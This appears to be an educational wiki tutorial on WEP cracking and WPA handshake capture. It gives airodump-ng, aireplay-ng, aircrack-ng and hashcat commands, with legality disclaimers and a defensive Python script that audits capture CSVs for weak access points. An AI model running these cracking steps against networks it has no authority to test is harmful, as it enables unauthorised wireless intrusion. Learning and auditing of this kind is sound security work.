Attacks: WEP Cracking, WPA Handshake Capture (en)

From OnnoWiki
Revision as of 07:22, 29 October 2024 by Onnowpurbo

Understanding WEP Cracking and WPA Handshake Capture Attacks

  • WEP Cracking: WEP (Wired Equivalent Privacy) is a wireless network security protocol that is considered obsolete because it has significant security weaknesses. WEP cracking attacks aim to crack the WEP encryption key and gain unauthorized access to the network.
  • WPA Handshake Capture: WPA (Wi-Fi Protected Access) is a stronger security protocol than WEP. However, WPA handshake capture attacks record the handshake packets (the initial exchange between a client and an access point) and then try to recover the passphrase from them offline with password-cracking tools.

Practical Example Using Kali Linux 2024.3

Preparation:

  • Have a target network: make sure you have permission to test it.
  • Make sure your wireless network adapter is in monitor mode: Use the `airmon-ng` command to see the list of adapters and `airmon-ng start wlan0` (replace wlan0 with your adapter name) to enable monitor mode.
  • Find a target network: Use the `airodump-ng wlan0mon` command (replace wlan0mon with the adapter name in monitor mode) to scan for nearby networks. Note the BSSID and channel of the target network.

WEP Cracking:

  • Start packet capture: `airodump-ng -c <channel> -w <file> wlan0mon` (replace <channel> with the channel number and <file> with the file name to save the packets).
  • Packet injection: `aireplay-ng -1 0 -a <BSSID> -c <client_BSSID> wlan0mon` (replace <BSSID> with the target network's BSSID and <client_BSSID> with the MAC address of a client connected to it).
  • Crack the key: after collecting enough packets, run `aircrack-ng <file>-01.cap` (airodump-ng appends `-01` to the name given with `-w`) to try to recover the key.

WPA Handshake Capture:

  • Start packet capture: Just like in WEP cracking, use `airodump-ng` to capture packets.
  • Wait for handshake: Wait for a handshake between the client and the access point. You should see a "handshake" message in the terminal.
  • Crack the handshake: use a tool like `hashcat` or `John the Ripper` to try to recover the passphrase from the captured handshake. You need a dictionary or wordlist of candidate passwords for this process.

Sample Commands:

# Start capturing WEP packets
airodump-ng -c 6 -w wep_capture wlan0mon

# Start capturing WPA packets
airodump-ng -c 11 -w wpa_capture wlan0mon

# Crack WEP key
aircrack-ng wep_capture-01.cap

# Crack WPA handshake (using hashcat; -m 2500 reads a .hccapx file, so convert the .cap first)
hashcat -m 2500 wpa_capture-01.hccapx /path/to/rockyou.txt

Notes:

  • Legality: Make sure you have the proper permission to perform this test. Attacking a network without permission is illegal.
  • Ethics: Use this tool for educational and ethical purposes. Do not misuse it for malicious purposes.
  • Complexity: The cracking process can take a long time, depending on the strength of the key or passphrase and the number of packets captured.
  • Evolving: Security protocols are constantly evolving. WPA2 and WPA3 are considered more secure than WEP and WPA.

Important to remember:

  • Learning objectives: The main goal of this exercise is to understand the concepts of network security and how attacks work.
  • Prevention: Once you understand how attacks work, you can implement better security measures to protect your network.
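As an added defensive example (not part of the original page), the Python script below audits the `-01.csv` file that `airodump-ng -w` writes beside the `-01.cap` and flags access points in your own estate that still run WEP or WPA/TKIP, which is the inventory step that prevention starts from. The CSV column names are assumed from the tool's output and the sample rows are constructed.

```python
"""Audit the -01.csv that airodump-ng -w writes beside the -01.cap and flag
access points with weak security. Added example, not from the page; data constructed."""
import csv
import io

# Constructed sample in the layout airodump-ng writes (column names are an
# assumption taken from the tool's output; check them against your own file).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-10-29 07:00:01, 2024-10-29 07:22:10,  6,  54, WEP, WEP, , -40, 1200, 48213, 0.0.0.0, 6, LabWEP, 
66:77:88:99:AA:BB, 2024-10-29 07:00:02, 2024-10-29 07:22:10, 11,  54, WPA, TKIP, PSK, -55, 900, 0, 0.0.0.0, 7, LabWPA1, 
CC:DD:EE:FF:00:11, 2024-10-29 07:00:03, 2024-10-29 07:22:10, 11, 130, WPA2, CCMP, PSK, -60, 950, 0, 0.0.0.0, 6, Office, 
22:33:44:55:66:77, 2024-10-29 07:00:04, 2024-10-29 07:22:10,  1, 130, WPA3, CCMP, SAE, -62, 800, 0, 0.0.0.0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2024-10-29 07:01:00, 2024-10-29 07:22:00, -50, 300, 00:11:22:33:44:55, LabWEP
"""

def parse_access_points(text):
    """Yield the AP rows (first section, up to the blank line) as dicts."""
    rows = csv.reader(io.StringIO(text), skipinitialspace=True)
    header = [h.strip() for h in next(rows)]
    for row in rows:
        if not any(f.strip() for f in row):
            break  # blank line: the station section follows
        yield dict(zip(header, (f.strip() for f in row)))

def classify(ap):
    """Map an AP row to (severity, reason), following the page's risk picture."""
    privacy, cipher, auth = ap["Privacy"], ap["Cipher"], ap["Authentication"]
    if "WEP" in privacy:
        # WEP keys are recovered from captured IVs, so the IV count is the exposure
        return "CRITICAL", f"WEP in use; {int(ap['# IV'])} IVs already seen"
    if privacy == "OPN":
        return "CRITICAL", "open network, no encryption"
    if privacy == "WPA" or "TKIP" in cipher:
        return "HIGH", "WPA/TKIP; move to WPA2-CCMP or WPA3"
    if privacy.startswith("WPA2") and auth == "PSK":
        return "MEDIUM", "WPA2-PSK; a captured handshake is guessed offline, passphrase strength is the control"
    return "OK", "WPA3/SAE or enterprise authentication"

def audit(text):
    """Return one finding per AP, worst severity first."""
    order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "OK": 3}
    findings = []
    for ap in parse_access_points(text):
        sev, why = classify(ap)
        findings.append({"essid": ap["ESSID"], "bssid": ap["BSSID"], "severity": sev, "reason": why})
    return sorted(findings, key=lambda f: order[f["severity"]])
```

Point `audit()` at the contents of your own capture's `-01.csv` to get the same report for networks you are responsible for.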

Additional Material:

To learn more, you can find more complete tutorials and documentation on Kali Linux, airodump-ng, aircrack-ng, hashcat, and other network security concepts.

Disclaimer:

This information is for educational and research purposes only. Use of this tool for illegal purposes is strictly prohibited.

Interesting Links

  • Ethical Hacking
  • Other attacks on wireless networks, such as IV reuse and WPS attacks.
  • How to secure a wireless network, such as using WPA2/WPA3 and MAC filtering.